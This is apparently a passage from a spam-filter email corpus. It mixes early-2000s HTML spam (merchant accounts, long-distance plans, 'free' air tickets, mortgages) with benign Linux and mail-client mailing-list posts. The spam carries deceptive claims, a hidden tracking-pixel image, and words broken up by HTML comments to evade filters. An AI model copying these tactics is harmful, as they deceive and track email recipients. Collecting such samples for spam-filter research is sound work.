 TODAY&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;span style="font-variant: small-caps"&gt;&lt;font size="6" color="#800080"&gt;we
 offer the lowest rates in the industry!&lt;/font&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font face="Comic Sans MS" size="4" color="#0000FF"&gt;START MAKING MONEY!&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font face="Comic Sans MS" size="4" color="#0000FF"&gt;ONLINE, ON THE PHONE, IN YOUR STORE,
 IN YOUR SHOP,&amp;nbsp; &lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font face="Comic Sans MS" size="4" color="#0000FF"&gt;FROM YOUR OFFICE OR HOME &lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font face="Comic Sans MS" size="4" color="#0000FF"&gt;RIGHT AWAY! &lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;a href="http://www.requestedinfo.net/cgi-bin/rbis.cgi?code=bt5bt5"&gt;&lt;font size="5" face="Comic Sans MS"&gt;C&lt;/font&gt;&lt;/a&gt;&lt;font size="5" face="Comic Sans MS"&gt;&lt;a href="http://65.118.155.151/cgi-bin/rbis.cgi?code=nmts"&gt;lick
 here to visit our website.&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Comic Sans MS" size="4"&gt;In just one minute you can complete the request
 form to receive a free statement analysis.&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&lt;font size="5"&gt;&amp;nbsp;&amp;nbsp; &lt;font color="#FF0000" size="6"&gt;&amp;nbsp;
 DON'T WAIT ANOTHER DAY! &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FF0000" size="5"&gt;&amp;nbsp;INCREASE YOUR SALES BY
 AS MUCH AS 1000%&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 get your add&lt;!--momma--&gt;ress out of our list, directions for re&lt;!--mom--&gt;moval on w&lt;!--pop--&gt;eb si&lt;!--loner--&gt;te.
 &lt;/div&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 33161186544333222
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Record industry defends practices to Senate
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85513221
 Date: Not supplied
 The Joint Hearing of the Senate Committee and Senate Select Committee on the 
 Entertainment Industry is underway in LA, investigating artists' claims that 
 the labels engage in unfair and corrupt business-practices. The first day's 
 findings at the hearings are really quite remarkable: 
     By contract, artists are prohibited from showing royalty statements to 
     third parties. Normally this would not include their mangers, lawyers, 
     consultants, or others who could aid them in getting paid, but apparently 
     this is not necessarily the case. Senator Kevin Murray, leading the 
     initiative for artists' rights, claimed the that Cary Sherman, Chief 
     Counsel for the RIAA himself, said to him in an interview, that RIAA 
     members (the major labels) would sue any artist that broke ranks and shared 
     information with the Committee. This claim was rejected by Sherman but 
     supported by others in the room. Don Henley, among them, outwardly dared 
     his record company to sue him for bringing royalty statements to the 
     hearing. He presented his most recent royalty statement for "Hell Freezes 
     Over," which showed the panel that even though his contract called for a no 
     more than a 10% "reserve" on sales of records shipped, Universal Music had 
     held back more than that for eleven pay periods (roughly under three years) 
     and that, even though his contract calls for no free goods in Europe, they 
     had deducted $87,000 in free goods charges to Europe.  
 Link[1] Discuss[2] (_Thanks, Paul!_)
 [1] http://www.musicdish.com/mag/?id=6675
 [2] http://www.quicktopic.com/boing/H/jU9jRkFhUcp
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: State of the art long distance                                                    7325ZMhY2-201HEQY5778-20
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;body bgcolor="#FFFFFF" text="#CC3333"&gt;
 &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;Hi: &lt;br&gt;
   &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3" color="#000000"&gt;Have 
   you been paying too much for your home or&lt;br&gt;
   business long distance?&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#000000"&gt;&lt;b&gt;&lt;font size="3"&gt;Have 
   you been looking for an affordable but honest&lt;br&gt;
   long distance alternative?&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;We are offering 
   Fiber optic Long distance for&lt;br&gt;
   as low as $9.95 per month!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="3"&gt;&lt;a href="mailto:phoneoffer001@netscape.com?subject=Phoneoffer"&gt;Email&lt;/a&gt; 
   us with your phone number and we'll call you&lt;br&gt;
   back so you can hear how great the connection is.&lt;br&gt;
   &lt;br&gt;
   Six plans to choose from including a travel plan. &lt;br&gt;
   &lt;br&gt;
   &lt;font color="#000000"&gt;There are no credit checks and because you don't &lt;br&gt;
   need to change your long distance carrier, your &lt;br&gt;
   service can be turned on in just a few hours. &lt;br&gt;
   &lt;/font&gt;&lt;br&gt;
   Distributors needed! &lt;br&gt;
   &lt;br&gt;
   &lt;font color="#000000"&gt;We have distributors now making a few hundred to &lt;br&gt;
   many thousands of dollars per month from the comfort &lt;br&gt;
   of their homes. &lt;/font&gt;&lt;br&gt;
   &lt;br&gt;
   Obtain &lt;a href="mailto:phoneoffer001@netscape.net?subject=Phoneoffer"&gt;complete 
   details&lt;/a&gt; Include your phone number- we'll&lt;br&gt;
   call you back to confirm our crisp clear connection.&lt;br&gt;
   &lt;br&gt;
   To be removed: &lt;a href="mailto:nottoday@netscape.net"&gt;click here&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 2032UFYD2-959lOlR2290WEYy6-444nUHE5892loyf3-037iQUI9771WgxC8-113WmiB1248QRl70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</si>
  <si>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On Sun, 11 Aug 2002, Russell Turpin wrote:
 &gt; If you have a rogue app on your machine, what keeps it from sniffing
 &gt; your passphrase? This is one of the reasons I keep harping on the need
 As long as the OS doesn't give you a convenient GetPassPhrase() method 
 that threat model is theoretical. Worms are autonomous, and autonomous 
 worms are not that smart.
 However, that's the reason I mentioned crypto hardware (USB fobs, smart 
 cards, etc).
 &gt; for thin, secure clients.
 While this is a good idea, the concept of security is holistic. It 
 involves a secure OS, secure apps, and crypto hardware. 
 &gt; When I read email, I want to respond to email, which means, were I
 &gt; using a digital signature, that it needs to be at the ready.
 I believe I mentioned users can't be bothered to enter passphrases. That's
 what tokens are there for. At some point we can expect a convenient USB
 port on the keyboard, or the video device front. Meanwhile, my Net PC 
 server sitting by the CRT with front USB ports will do.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">--##########
 See below for your Exit Information.
 ============================================================================================================
 2 FREE Round-Trip Air Tickets! USA, Caribbean, Hawaii, Mexico! 
 1,000 Complimentary Long Distance Calling Minutes 
 To get this incredible TALK &amp; TRAVEL offer NOW, click on the 
 link below or paste it into your browser: 
 http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816 
 Imagine jetting off to exciting destinations in California, 
 Florida, the Caribbean, Hawaii or Mexico, ABSOLUTELY FREE! 
 Then, imagine spending 1,000 minutes on the phone with friends 
 and family, ABSOLUTELY FREE! To top it all off, imagine 
 enjoying low, low long distance rates - anytime, anywhere! 
 ACT NOW! This is a LIMITED TIME OFFER, click on the link below 
 or paste it into your browser: 
 http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816 
 This is a totally risk-free, 100% satisfaction-guaranteed offer. 
 You get FREE TRAVEL, COMPLIMENTARY LONG DISTANCE MINUTES, plus 
 the LONG DISTANCE RATES. Your 2 FREE ROUND-TRIP AIR TICKETS are 
 yours to keep and good for one full year! 
 2 FREE ROUND-TRIP AIR TICKETS 1,000 COMPLIMENTARY CALLING 
 MINUTES LOW, LOW LONG DISTANCE RATES 
 Click on the link below or paste it into your browser: 
 http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816
 ============================================================================================================
 Your email address has been submitted to The PermissionPass Network for mailing by one of our merchant clients, or included as part of an assets purchase.  You may permanently remove yourself at http://www.permissionpass.com/optout.php?email=jm@netnoteinc.com&amp;pos=9900027056.  Thank you..
 - Reservation Desk
 --##########
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 &lt;table&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face="arial" size="1"&gt;&lt;u&gt;See below for your Exit Information.&lt;/U&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TD&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://results.reliatrack.com/active.php?xactive=9900027056&amp;yactive=http://results.reliatrack.com/active.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/TABLE&gt;
 &lt;html&gt; 
 &lt;head&gt; 
 &lt;title&gt;2 FREE Airline Tickets!&lt;/title&gt; 
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt; 
 &lt;/head&gt; 
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt; 
 &lt;table width="193" border="0" cellspacing="0" cellpadding="0"&gt; 
 &lt;tr&gt; 
 &lt;td&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l1.gif" width="243" height="201" border="0"&gt;&lt;/a&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l2.gif" width="169" height="201" border="0"&gt;&lt;/a&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l3.gif" width="236" height="201" border="0"&gt;&lt;/a&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt; 
 &lt;td&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l4.gif" width="243" height="154" border="0"&gt;&lt;/a&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l5.gif" width="169" height="154" border="0"&gt;&lt;/a&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/s4l6.gif" width="236" height="154" border="0"&gt;&lt;/a&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt; 
 &lt;td&gt; 
 &lt;div align="left"&gt;&lt;font size="4" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=9900027056&amp;active=1783816"&gt;&lt;img src="http://www.save4less.com/creative/s4l_2agraph/animation.gif" width="648" height="85" border="0"&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt; 
 &lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;/table&gt; 
 &lt;p&gt; &lt;/p&gt; 
 &lt;/body&gt; 
 &lt;/html&gt;&lt;!--06qfV--&gt;&lt;table&gt;
 &lt;tr&gt;
 &lt;!--9900027056/6--&gt;
 &lt;td&gt;&lt;font color="black" face="arial" size="1"&gt;
 Your email address has been submitted to The PermissionPass Network for mailing by one of our merchant clients, or included as part of an assets purchase.  You may permanently remove yourself by clicking &lt;a href="http://www.permissionpass.com/optout.php?email=jm@netnoteinc.com&amp;pos=9900027056"&gt;HERE&lt;/a&gt;.  Thank you.
 &lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 --##########--
</t>
  </si>
  <si>
    <t xml:space="preserve">There was also an interface called plum, but I was never able to get it 
 to work on the platform I was using in those days (SGI).  Since plum 
 was written for perl4, it would probably need a major overhaul to work 
 well with modern Perl.  It's pretty ugly code, too, being written by 
 Tom Christiansen. :-)
 	-jan-
 -- 
 Jan L. Peterson
 &lt;jlp@softhome.net&gt;
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: intentions
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --f0KYrhQ4vYSV2aJu
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Craig,
     I don't really understand how you can make the claims that you
     make without a full understanding of TeS, which you can't have
     because we haven't published the details.
     In the end, given that you don't know much about TeS or how it
     works, your statements really call into question your intentions
     given that you have a competing product in this space.
 Regards,
 --jordan
 --f0KYrhQ4vYSV2aJu
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9UuwVpwQdAVEbU7oRAgPAAKCBgOAqyCLpbBmryq53F7IZo8yvtQCfQYms
 6dk7xDTKr9UIZeG9Z0Y1AZg=
 =7tWy
 -----END PGP SIGNATURE-----
 --f0KYrhQ4vYSV2aJu--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: curses interface to nmh
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Fri, 26 Jul 2002 10:06:41 EDT,
 	pll@lanminds.com wrote:
 &gt; [...]Unless someone writes a really neat curses based 
 &gt; interface to ride on top of nmh :)
 Years ago, there was a package called mh-e which was an emacs interface
 to MH.  I don't know if it's still around or works.  But it's an idea.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: My Repository...
</t>
  </si>
  <si>
    <t xml:space="preserve">Just for your information, I have an apt-repository for RH 7.3 at
 http://utelsystems.dyndns.org
 --
 NOS@Utel.no
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Formatting a windows partition from Linux
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a bit of a messy solution but might be useful -
 If you have an internal zip drive (not sure about external) and
 you bios supports using a zip as floppy drive, you could 
 use a bootable zip disk with all the relevant dos utils.
 G.
 ___________________________
  Graham Smith,
  Network Administrator,
  Department of Computing,
  Institute of Technology,
  Tallaght, Dublin 24
  Phone: + 353 (01) 4042840
 -----Original Message-----
 From: Ciaran Johnston [mailto:cj@nologic.org]
 Sent: 21 August 2002 16:22
 To: ilug@linux.ie
 Subject: Re: [ILUG] Formatting a windows partition from Linux
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: (no subject)
</t>
  </si>
  <si>
    <t xml:space="preserve">I've picked up these patches and will submit to CVS eventually.
 If there are bugs worth fixing, please let me know about the fixes
 for them.
 &gt;&gt;&gt;Mark Scarborough said:
  &gt; 
  &gt; tg@sema.se said:
  &gt; &gt;  mscar &lt;mscar-list-exmh@cactus.org&gt; said:
  &gt; &gt;  &gt; My biggest problem with it is that it will _always_ render 
 the HTML
  &gt; &gt;  &gt; in messages that are only HTML (possible speed and/or "I 
 didn't
  &gt; &gt;  &gt; want to see that porno email" problems). Also, it does away 
 with
  &gt; &gt;  &gt; the option to view an HTML part in Netscape. There might be 
 times
  &gt; &gt;  &gt; when I want to use a more fully-featured viewer if I 
 determine that
  &gt; &gt;  &gt; it's worth the risk.
  &gt; 
  &gt; 
  &gt; &gt; Try these two patches (for exmh-2.5 07/13/2001) I just tossed
  &gt; &gt; together.
  &gt; 
  &gt; &gt; The config option $uri(deferDisplaysInline) probably doesn't 
 makes any
  &gt; &gt; sense,  it should probably always be off. But you never know what
  &gt; &gt; people like...
  &gt; 
  &gt; &gt; Anyway, when you get a text/html part and you have defer 
 selected, you
  &gt; &gt; can  display it inline by checking the box in the right-button 
 menu.
  &gt; 
  &gt; &gt; /Tomas G. 
  &gt; 
  &gt; 
  &gt; Tomas,
  &gt; 
  &gt; This is GREAT!  Thank you!  This is exactly what I was thinking 
 about as
  &gt; the "best" solution whether I expressed it well or not.
  &gt; 
  &gt; There are a couple of "coloring" or "highlighting" bugs that I 
 haven't had
  &gt; time to fully characterize yet, but I don't care.  We can work out 
 the bugs
  &gt; - at least we have the functionality.
  &gt; 
  &gt; Everyone: if you have ever wanted to be able to choose between the 
 internal
  &gt; HTML engine and whatever external browser you have defined - on a 
 per
  &gt; message basis - give Tomas' patches a try.
  &gt; 
  &gt; Thanks again Tomas.
  &gt; 
  &gt; Mark
  &gt; 
  &gt; 
  &gt; 
  &gt; 
  &gt; _______________________________________________
  &gt; Exmh-users mailing list
  &gt; Exmh-users@redhat.com
  &gt; https://listman.redhat.com/mailman/listinfo/exmh-users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</si>
  <si>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Subject: RE: 6.25 30 YR Fixed Home Loan, No Points flu
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;table height="338" cellSpacing="0" cellPadding="0" width="539" border="0" style="border:12px double #006600; border-collapse:collapse; padding-left:4; padding-right:4; padding-top:1; padding-bottom:1" bordercolor="#111111" bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="4" height="423"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td vAlign="top" align="left" width="535" height="423" style="border-style: solid; border-width: 0"&gt;
     &lt;table cellSpacing="0" cellPadding="4" width="95%" border="0" bgcolor="#FFFFFF" style="border-collapse: collapse" bordercolor="#111111"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" align="right" height="424"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;
               &lt;br&gt;
               &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font color="#000000"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Dear 
               Homeowner,&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
 &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;
               *&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FF0000"&gt;6.25% 
               30 Yr Fixed Rate Mortgage&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font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
             &lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="504" border="0" style="position: relative; border-collapse: collapse" bordercolor="#111111" height="1"&gt;
           &lt;tr&gt;
             &lt;td vAlign="top" width="325" height="1"&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;br&gt;
               &lt;/a&gt;
               &lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=b13"&gt;Click Here for a Free Quote!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=A11"&gt;
               &lt;/a&gt;
             &lt;/div&gt;
             &lt;p&gt;&lt;b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Lock 
             In YOUR LOW FIXED RATE TODAY&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;dl&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000"&gt;a&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;NO 
               POINTS&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;NO 
               COST OUT OF POCKET&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;NO 
               UPFRONT FEES&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;NO 
               OBLIGATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;FREE 
               CONSULTATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;ALL 
               CREDIT GRADES ACCEPTED&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
             &lt;/dl&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana,Arial,Helvetica,sans-serif" color="red" size="2"&gt;
               &lt;b&gt;
               &lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=b13"&gt;6.25% won't stay this low forever!&lt;br&gt;
               Click for your Free Quote, NOW!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td vAlign="top" width="4" height="1"&gt;
             &lt;div align="right"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td width="175" height="1" bgcolor="#FFFFFF" bordercolor="#006600"&gt;
             &lt;h1&gt;&lt;span style="vertical-align: middle"&gt;
             &lt;font face="Webdings" style="font-size: 200" color="#006600"&gt;
             &lt;a href="http://66.231.133.63/index.html?ID=b13"&gt;
             &lt;font color="#006600"&gt;H&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/span&gt;&lt;/h1&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="3" width="472" border="0"&gt;
           &lt;tr&gt;
             &lt;td colSpan="2" height="64"&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
             &lt;table cellSpacing="2" cellPadding="0" width="482" border="0" height="38"&gt;
               &lt;tr&gt;
                 &lt;td width="327" height="36" style="border-style: solid; border-width: 0"&gt;
                 &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Apply 
                 now and one of our lending partners will get back to you within 
                 48 hours.&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141" bgcolor="#FF0000" height="36" style="border-left-style: solid; border-left-width: 1"&gt;
                 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="4"&gt;
                 &lt;a style="text-decoration: none" href="http://66.231.133.63/index.html?ID=b13"&gt;
                 &lt;font color="#FFFFFF"&gt;CLICK HERE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;To Be Removed Please &amp;quot;&lt;a href="http://66.231.133.63/final/index_remoov.html?ID=b13"&gt;Clicking 
 Here&lt;/a&gt;&amp;quot; . &lt;/p&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, from the looks of things, I can import all my mail settings from
 Evolution to Sylpheed.  Has anyone successfully run Sylpheed in Gnome
 2.0?  I noticed with 'apt-get install gnome-session' from the 'rpm
 http://apt.sunnmore.net gnome2 73' repository, Sylpheed isn't one of the
 packages selected for deletion.
 Lance
 On Wed, 2002-07-24 at 14:05, Julian Missig wrote:
 &gt; On Wed, 2002-07-24 at 03:50, Angles Puglisi wrote:
 &gt; &gt; Lance (lance_tt@bellsouth.net) wrote*:
 &gt; &gt; &gt;
 &gt; &gt; &gt;well, from the looks of things, Evolution mail client isn't supported
 &gt; &gt; &gt;just yet, so I reckon I'll wait a bit.  Whoever posted these gnome2 apt
 &gt; &gt; &gt;repositories, thanks!!!
 &gt; &gt; &gt;
 &gt; &gt; 
 &gt; &gt; I'm uising Havoc Pennington's Gnomehide and it rocks. I installed it before I
 &gt; &gt; knew about apt, but one of the previous emails had an apt repository that
 &gt; &gt; claimed to have gnomehide. Just remember there is one kew file that makes the
 &gt; &gt; difference between Gnome1 and Gnome2 being used. I *think* it is "gnome-core"
 &gt; &gt; vs. "gnome-session" but I can not remember.
 &gt; &gt; 
 &gt; &gt; Note that that those same files are probably in the Limbo beta, except
 &gt; &gt; updated. There has not been a major change to "gnomehide" in a while, I
 &gt; &gt; suspect Havoc's work went into Limbo then.
 &gt; 
 &gt; Right, gnomehide is only updated when it's been a while since the last
 &gt; red hat release, and the next beta isn't out yet. Since the beta is out
 &gt; now, gnomehide won't be updated again for a while.
 &gt; 
 &gt; Julian
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 -- 
 :
 ####[ Linux One Stanza Tip (LOST) ]###########################
 Sub : Monitoring su attempts                         LOST #115
 In a multiuser system you may like to monitor all su attempts.
 Edit /etc/login.defs and edit SULOG_FILE as follows:
 SULOG_FILE    /var/log/sulog   ... (name of file to hold info)
 ####&lt;bish@nde.vsnl.net.in&gt;####################################
 :
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Sparc Solaris (was: Dell GX260 V Redhat 7.3)
</t>
  </si>
  <si>
    <t xml:space="preserve">Declan Houlihan mentioned:
 &gt; We're actually investigating switching from Sparc/Solaris to
 &gt; Intel/Linux.
 And then:
 &gt; At the moment at work, if we want a new workstation, we just
 &gt; buy whatever Sun's latest system is, we jumpstart it, and
 &gt; that's it, it's up and running.
 Well, why not try Linux on Sparc. It works pretty well and I have not had
 major issues with it. There are minor problems: like the serial console
 drivers, but for workstation installs I suspect it will work fine.
 And you get a working version of your favourite KDE/Gnome desktop instead of
 DTE, uhm, I mean CDE.
 &gt; Basically the whole installation procedure is
 &gt; "boot net - install"
 Well, you have to add the workstation to the install server first.
 Talking of which, you can install Sparc Linux using this technique as well.
 The image takes a while to load, but once this is done you can install in
 the normal fashion.
 SuSe for Sparc works fine. I am using Debian because the Sun boxen I have
 subverted do not have graphics consoles. It also just works.
 If you have a spare workstation, I am sure I could burn a couple of CD's for
 you. (If I can find them.)
 - Matthew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</si>
  <si>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Kate asked about this several months ago, and I posted some code and hints on 
 how to work around this problem. AFAIR, you simply refer to the form elements 
 by their names, including brackets, but put " or ' around them, ie:
 val = "document.form.city[1]";
 I think that works, there's an answer to this question on http://faqts.com/ 
 where I got the original answer.
 Donncha.
 On Monday 19 August 2002 18:28, Dave Wilson wrote:
 &gt; &gt; er, i understood you until you reached the above. Maybe its my lack of
 &gt; &gt; PHP but why would a variable name _need_ to end with [] ?
 &gt; &gt;
